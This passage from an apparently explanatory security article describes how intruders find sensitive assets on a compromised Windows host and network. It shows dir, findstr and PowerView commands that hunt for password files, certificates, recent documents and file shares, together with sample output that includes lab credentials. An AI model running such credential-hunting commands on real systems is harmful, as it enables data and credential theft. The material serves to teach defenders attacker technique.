The simplest example of asset discovery is a file search on the compromised system. It is common to see backdoors having a built-in functionality of searching for files on the target’s file system. However, using native commands, which serve the same purpose, might be used by attackers when no malware is present and only a shell access is available. In such a case a variation of the following command can be used by an adversary in order to look for sensitive files.
C:\Users\RayC\Desktop>dir *password.txt *.cert* *.docx *.pdf /s
Directory of C:\Users\RayC\Desktop
2014-01-27 12:37 50 facebook_password.txt
Directory of C:\Users\RayC\Desktop\projects
2016-07-07 12:13 111,303 2016_concept.docx
2016-08-27 02:06 711,303 2017_concept_v2.docx
2013-01-24 12:41 11,404 Bank_statement.docx
2016-08-19 17:40 134,303 Meeting_summary.docx
2015-02-27 18:55 171,303 RnD.docx
Directory of C:\Users\RayC\Desktop\projects
2015-05-27 12:42 90,512 Final_Report.pdf
Directory of C:\Users\RayC\Desktop\secrets
2011-08-27 12:39 792 Ray_C.cert
Another approach to find relevant files is to list the contents of recently accessed files by the user. This can be achieved combining dir and findstr commands as shown below.
C:\>dir C:\Users\RayC\AppData\Roaming\Microsoft\Windows\Recent | findstr "docx pdf cert txt"
2016-08-27 12:39 725 Ray_C.cert.lnk
2016-08-26 00:20 537 a.txt.lnk
2016-08-20 19:55 1,402 Aanalysis_of_ The_Political_CMP.pdf.lnk
2016-08-20 19:55 1,277 CrowdStrike_Analysis.pdf.lnk
2016-08-27 12:37 821 enterprise_logins.txt.lnk
2016-08-27 12:36 695 facebook_password.txt.lnk
2016-08-27 12:42 984 Final_Report.pdf.lnk
2016-08-16 01:58 1,048 hint.txt.lnk
2016-08-26 00:01 647 INSTRUCTIONS.txt.lnk
2016-08-20 19:55 1,342 Microsoft_Report.pdf.lnk
2016-08-16 01:57 1,037 notes.txt.lnk
2016-08-27 12:40 761 RnD.docx.lnk
2016-08-23 22:46 1,107 rpt-2016.pdf.lnk
2016-08-24 00:42 1,107 rpt-2015.pdf.lnk
2016-08-20 19:57 1,307 tactical-investments.pdf.lnk
2016-08-20 20:02 1,332 visiting_conference.pdf.lnk
2016-08-20 20:14 1,177 wp-operation-status.pdf.lnk
While searching for files by a fragment of a filename is a quick way to initially discover interesting assets, a more efficient way is to search for files by their contents. This can also be performed by native Windows commands like find or findstr. An example of such a case while looking for user credentials in a specified location is provided below.
C:\Users\johndoe\Desktop>findstr /S/I "username password certificate" *.cert *.txt
facebook_password.txt:username: RayC
facebook_password.txt:password: YouWillNewverGuess!!!
secrets\enterprise_logins.txt:username: Ray
secrets\enterprise_logins.txt:password: Uyre^3!q3.?
secrets\enterprise_logins.txt:username: RayC@contoso.com
secrets\enterprise_logins.txt:password: Default123!
secrets\Ray_C.cert:-----BEGIN CERTIFICATE-----
secrets\Ray_C.cert:-----END CERTIFICATE-----
In an enterprise environment it is common to see file servers used for storing sensitive information. Therefore, a file search on remote systems can be performed from the compromised computer without the need of hacking the file server itself. Given the pre-condition that the hacker has obtained the credentials needed to access files on the remote system the tool PowerView can be used to easily enumerate network resources and perform search on those resources as shown in the example below.
PS C:\Users\RayC> Invoke-ShareFinder -ExcludeStandard
\\NODE4.contoso.com\Documents -
\\NODE4.contoso.com\Users -
\\FILE_SERVER.contoso.com\Storage -
\\FILE_SERVER.contoso.com\Users -
\\NODE2.contoso.com\New folder -
\\NODE2.contoso.com\Users -
\\NODE3.contoso.com\Users -
\\NODE1.contoso.com\Users -
\\SLC-DC01.contoso.com\Address - "Access to address objects"
\\SLC-DC01.contoso.com\CertEnroll - Active Directory Certificate Services share
\\SLC-DC01.contoso.com\ExchangeOAB - OAB Distribution share
\\SLC-DC01.contoso.com\GroupMetrics - MailTips group metrics publishing point
\\SLC-DC01.contoso.com\NETLOGON - Logon server share
\\SLC-DC01.contoso.com\PSTFiles -
\\SLC-DC01.contoso.com\SYSVOL - Logon server share
\\SLC-DC01.contoso.com\Templates -
PS C:\Users\RayC> Find-InterestingFile \\FILE_SERVER\Storage -OfficeDocs
FullName : \\FILE_SERVER\Storage\Contract_BANK_X.docx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:47:46 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 41187
FullName : \\FILE_SERVER\Storage\Contract_Legal.docx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:46:44 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 23829
FullName : \\FILE_SERVER\Storage\Expenses.xlsx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:51:53 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 37989
FullName : \\FILE_SERVER\Storage\Financial_Report.xlsx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:51:14 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 8802
FullName : \\FILE_SERVER\Storage\Report_December_2015.docx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:45:58 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 12589
Finally, it’s worth mentioning that files are not always the asset which attacker is looking for. For example, sometimes the correspondence between specific people is a matter of interest. In such a case, attackers try to gain access to communication channels, such as email or instant messaging accounts, mobile phones, etc. Additionally, access to a certain computer on the network can also be the target of the intruders. If that’s the case, attackers try to find the computer on the network and gain access to it.